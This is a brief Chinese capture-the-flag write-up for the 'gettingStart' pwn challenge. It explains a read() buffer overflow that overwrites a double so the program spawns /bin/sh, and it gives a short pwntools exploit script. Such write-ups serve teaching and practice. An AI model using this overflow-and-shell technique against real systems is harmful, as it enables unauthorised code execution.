[Pwn] gettingStart -MF

xp0int Posted on Oct 14 2018

十分无脑的题目，read函数存在溢出，改掉double v8的值，且不要动v7，即可满足下面条件，执行system("/bin/sh")

脚本如下，其中，4591870180066957722就是浮点数0.1在内存中的值。

from pwn import *
p = process('./task_gettingStart_ktQeERc')
p.send('a'*0x18 + p64(0x7FFFFFFFFFFFFFFF) + p64(4591870180066957722))
p.interactive()

打赏还是打残，这是个问题